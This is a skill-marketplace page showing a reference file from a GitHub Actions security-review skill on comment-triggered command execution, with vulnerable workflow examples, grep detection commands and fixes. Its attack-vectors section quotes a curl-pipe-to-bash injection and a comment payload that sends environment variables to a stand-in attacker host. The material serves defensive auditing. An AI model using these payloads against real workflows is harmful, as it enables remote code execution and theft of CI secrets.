All skills
getsentry avatar

/gha-security-review

@e99aa67 official
by Sentrygetsentry/skills1k stars
53

GitHub Actions security review for workflow exploitation vulnerabilities. Use when asked to "review GitHub Actions", "audit workflows", "check CI security", "GHA security", "workflow security review", or review .github/workflows/ for pwn requests, expression injection, credential theft, and supply chain attacks. Exploitation-focused with concrete PoC scenarios.

Use this Skill: https://skilld.dev/gh/getsentry/skills/gha-security-review

This session only. Nothing lands on disk.

referencescomment-triggered-commands.md

≈1.4k tokens on demand. Your agent reads this file only when SKILL.md points to it.

Comment-Triggered Command Execution

Overview

Workflows triggered by issue_comment that parse commands from comment bodies (e.g., /deploy, /version, /approve) can be exploited if they lack authorization checks. Any GitHub user can comment on public repository issues/PRs, making unprotected command handlers a direct RCE vector.


The Vulnerability

# VULNERABLE: No author check — any GitHub user can trigger
on:
  issue_comment:
    types: [created]

jobs:
  deploy:
    if: contains(github.event.comment.body, '/deploy')
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: ./deploy.sh

Any GitHub user can comment /deploy on any issue or PR, and the workflow will execute.


Attack Vectors

Unauthorized Command Execution

The simplest attack: trigger a privileged operation without authorization.

# VULNERABLE: Any commenter can trigger version bump
on: issue_comment
jobs:
  version:
    if: |
      github.event.issue.pull_request &&
      contains(github.event.comment.body, '/version')
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.ref }}
      - run: ./version.sh -u -n

Real-world: Used against project-akri (CNCF project). The attacker modified version.sh in their fork PR to inject curl -sSfL https://attacker.com/steal | bash at the top, then commented /version minor to trigger execution. No author_association check existed.

Compound: Command + Expression Injection

When the comment body is both the trigger AND used in a run: block:

# VULNERABLE: Double risk — no auth + expression injection
on: issue_comment
jobs:
  greet:
    if: startsWith(github.event.comment.body, '/greet')
    steps:
      - run: echo "Greeting from: ${{ github.event.comment.body }}"

Payload comment:

/greet"; curl https://attacker.com/$(env | base64) #

Command with Fork Checkout

# VULNERABLE: Comment triggers checkout of fork code
on: issue_comment
jobs:
  test:
    if: |
      github.event.issue.pull_request &&
      contains(github.event.comment.body, '/test')
    steps:
      - uses: actions/checkout@v4
        with:
          ref: refs/pull/${{ github.event.issue.number }}/merge
      - run: npm test  # Runs fork's test suite

This combines the issue_comment authorization problem with a pwn request — the comment triggers execution of untrusted fork code.


Detection Patterns

# Find issue_comment workflows
grep -rn "issue_comment" .github/workflows/

# Check for command patterns in conditions
grep -A10 "issue_comment" .github/workflows/*.yml | grep "contains\|startsWith"

# Check if author_association is validated
grep -A20 "issue_comment" .github/workflows/*.yml | grep "author_association"

# Check if comment body is used in run blocks
grep -A30 "issue_comment" .github/workflows/*.yml | grep "comment\.body"

The Fix: Author Association Check

# SAFE: Only org members can trigger commands
on:
  issue_comment:
    types: [created]

jobs:
  deploy:
    if: |
      contains(github.event.comment.body, '/deploy') &&
      (
        github.event.comment.author_association == 'MEMBER' ||
        github.event.comment.author_association == 'OWNER' ||
        github.event.comment.author_association == 'COLLABORATOR'
      )
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: ./deploy.sh

Author Association Values

Value Meaning Trust Level
OWNER Repository owner Trusted
MEMBER Organization member Trusted
COLLABORATOR Invited collaborator Trusted
CONTRIBUTOR Has merged PR Partially trusted
FIRST_TIMER First PR ever Untrusted
FIRST_TIME_CONTRIBUTOR First PR to this repo Untrusted
NONE No association Untrusted

Recommended: Only allow MEMBER, OWNER, and COLLABORATOR.

Additional Protections

# SAFER: Author check + no expression injection + approval team
jobs:
  deploy:
    if: |
      contains(github.event.comment.body, '/deploy') &&
      github.event.comment.author_association == 'MEMBER'
    steps:
      - uses: actions/checkout@v4
      # Use env var for any comment data, not ${{ }} in run:
      - env:
          COMMENT_BODY: ${{ github.event.comment.body }}
        run: |
          # Parse command arguments safely
          ARGS=$(echo "$COMMENT_BODY" | grep -oP '(?<=/deploy\s).*' | head -1)
          # Validate arguments against allowlist
          if [[ "$ARGS" =~ ^(staging|production)$ ]]; then
            ./deploy.sh "$ARGS"
          else
            echo "Invalid deploy target: $ARGS"
            exit 1
          fi

Exploitation Scenario Template

ATTACK: Unauthorized Command via issue_comment
ENTRY: Attacker comments on a public issue/PR
PAYLOAD: Comment body containing "/[command]" [+ optional injection]
TRIGGER: issue_comment workflow at [file:line], condition at line [N]
  matches without checking author_association
EXECUTION: [What runs — script execution, fork checkout, etc.]
IMPACT: [RCE, deployment trigger, secret access, etc.]

References

Source: SKILL.md on GitHub

2 alerts1d5 checks · Risk CRITICAL
  • Gen Agent Trust Hub1d

    This skill is a defensive security toolkit designed to audit GitHub Actions workflows for common vulnerabilities. It provides educational references and concrete examples of exploitation techniques such as shell injection, pwn requests, and credential escalation. While the skill contains code snippets and URLs associated with real-world attacks—documented as pedagogical examples to assist auditors—its intent is purely defensive and educational.

  • Socket1d

    2 alerts: gptSecurity

  • Snyk1d

    Risk: LOW · No issues

  • Runlayer7mo

    9/10 files flagged

  • ZeroLeaks5mo

    Score: 93/100 · 2 sections analyzed

Signed by skilld at e99aa67. This ties the file your Agent reads to that commit on GitHub. It does not review the instructions.

Last checked against GitHub yesterday.

Activeupdated last week
All 1 allowed tools
Read Grep Glob Bash Task
  • github-actions
  • workflow-security
  • ci-cd
  • expression-injection
  • supply-chain
  • pull-request-target
  • credential-theft
  • yaml

README badge

README badge for getsentry/skills/gha-security-review

Audits GitHub Actions workflows for externally-exploitable vulnerabilities including expression injection, credential theft, and pwn-request patterns. The skill traces complete attack paths from fork PRs and comments through to execution, and reports only HIGH and MEDIUM confidence findings with concrete proof-of-concept scenarios.

Generated from the current SKILL.md.

What threat model does this skill use?
The skill focuses on vulnerabilities exploitable by external attackers without write access — those who can open PRs from forks, create issues, and post comments. It does not flag vulnerabilities that require repository write access, such as workflow_dispatch input injection or expression injection in push-only workflows on protected branches.
What confidence levels does this skill report?
Only HIGH and MEDIUM confidence findings. HIGH requires a complete traced attack path with exploitation scenario. MEDIUM indicates a partially confirmed attack path that needs verification. LOW confidence theoretical issues are not reported.
What types of GitHub Actions vulnerabilities does this skill check for?
The skill checks for pwn request exploitation, expression injection, unauthorized command execution via issue comments, credential escalation, config file poisoning, insecure third-party action pinning, and unsafe permissions or secrets scoping.
Does this skill flag all uses of pull_request_target?
No. pull_request_target is only flagged if the workflow also checks out fork code or executes code from the PR. pull_request_target without fork checkout is marked as safe.
Does this skill review workflows in other repositories?
No. The skill reviews workflows in the provided repository only. Dependencies on workflows in other repositories are noted but not audited.

Generated from the current SKILL.md. These answers refresh after source changes.